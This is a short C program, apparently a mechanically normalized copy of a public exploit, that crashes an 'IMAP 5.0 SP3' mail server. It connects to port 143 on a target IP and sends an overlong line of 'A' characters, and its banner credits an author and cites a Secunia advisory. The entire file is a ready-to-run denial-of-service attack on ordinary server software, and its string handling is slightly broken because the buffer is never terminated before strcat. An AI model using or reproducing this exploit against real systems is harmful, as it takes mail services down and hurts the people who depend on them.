
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct sockaddr_in {int sin_addr; int sin_family; int sin_port; } ;
struct sockaddr {int dummy; } ;
typedef int saddr ;
typedef int buf ;


 int AF_INET ;
 int INVALID_SOCKET ;
 int MAKEWORD (int,int) ;
 scalar_t__ SOCKET_ERROR ;
 int SOCK_STREAM ;
 scalar_t__ WSAStartup (int ,int *) ;
 int close (int ) ;
 int closesocket (int ) ;
 scalar_t__ connect (int ,struct sockaddr*,int) ;
 int exit (int) ;
 int htons (int) ;
 unsigned long inet_addr (char*) ;
 int memcpy (int *,unsigned long*,int) ;
 int memset (struct sockaddr_in*,int ,int) ;
 int printf (char*,...) ;
 int send (int ,char*,int,int ) ;
 int sock ;
 int socket (int ,int ,int ) ;
 int strcat (char*,char*) ;
 int wVersionRequested ;
 int wsaData ;

int main(int argc, char **argv)
{
   char buf[280];
   struct sockaddr_in saddr;
   unsigned long ip;
   int i;

   if (argc != 2)
   {
    printf("IMAP 5.0 SP3 - DoS Exploit!\r\n");
    printf("Coded by OmniPresent - omnipresent@email.it\r\n");
    printf("IMAP 5.0 SP3 - DoS Exploit!\r\n");
    printf("Advisory: http://secunia.com/advisories/19267/\r\n");
    printf("%s <IP_Address>\r\n", argv[0]);

 exit(1);
   }

   ip = inet_addr(argv[1]);
   if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET)
   {
      printf("Socket Error \n");
      exit(1);
   }


   memset(&saddr,'0', sizeof(saddr));
   saddr.sin_port = htons(143);
   saddr.sin_family = AF_INET;
   memcpy(&saddr.sin_addr, (unsigned long *)&ip, sizeof((unsigned long *)&ip));

   if (connect(sock, (struct sockaddr *)&saddr, sizeof(saddr)) == SOCKET_ERROR)
   {
      printf("Connect Error \n");
      exit(1);
   }

   for (i=0; i<278; i++) {
      buf[i] = 'A';
   }
   strcat(buf, "\r\n");


   send(sock, buf, sizeof(buf), 0);




 close(sock);

 printf("DoS Attack Done!\n");
}
